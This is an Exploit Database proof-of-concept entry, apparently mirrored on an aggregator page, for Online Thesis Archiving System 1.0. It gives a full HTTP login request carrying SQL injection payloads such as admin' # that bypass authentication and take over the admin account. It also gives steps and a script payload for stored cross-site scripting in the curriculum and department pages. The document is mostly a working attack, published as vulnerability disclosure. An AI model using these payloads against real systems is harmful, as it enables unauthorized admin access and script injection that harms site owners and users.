Online Thesis Archiving System 1.0 – SQLi Authentication Bypass

• Exploit Database
• 13 阅读

• 作者： Yehia Elghaly
  日期： 2021-12-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50597/

• # Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
  # Exploit Author: Yehia Elghaly (YME)
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
  # Version: Online Thesis Archiving System 1.0
  # Tested on: Windows, xampp
  # CVE: N/A
  
  - Description:SQLi Authentication Bypass
  SQL Injection vulnerability exists in Online Thesis Archiving System 1.0 1.0. An admin account takeover exists with the payload: admin' # -admin' or '1'='1
  
  PoC:
  
  POST /otas/admin/login.php HTTP/1.1
  Host: 192.168.113.130
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 35
  Origin: http://192.168.113.130
  DNT: 1
  Connection: close
  Referer: http://192.168.113.130/otas/admin/login.php
  Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc
  Upgrade-Insecure-Requests: 1
  
  username=admin' #&password=admin' #
  
  - Description: Stored Cross Site Scripting (XSS)
  Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0. 
  
  Steps:
   
  1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)
  2- Add new (curriculum) or (department) 
  3- Insert your payload <script>("xssyf")</script>